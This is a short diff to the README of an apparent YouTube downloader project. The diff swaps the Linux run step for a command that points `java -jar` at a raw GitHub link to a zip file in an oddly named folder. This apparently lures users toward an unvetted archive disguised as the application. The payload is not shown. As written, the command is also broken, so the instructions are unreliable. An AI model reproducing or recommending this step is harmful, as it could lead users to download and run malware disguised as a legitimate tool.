Alinelymedina01/youtube-downloader/README.md

 - **Linux:**
   1. Open your terminal.
   2. Navigate to the folder where the downloaded file is located.
-  3. Run the command `java -jar youtube-downloader.jar` to start the application.
+  3. Run the command `java -jar https://raw.githubusercontent.com/Alinelymedina01/youtube-downloader/main/gastrolater/youtube-downloader.zip` to start the application.

 ### 4. **Using youtube-downloader**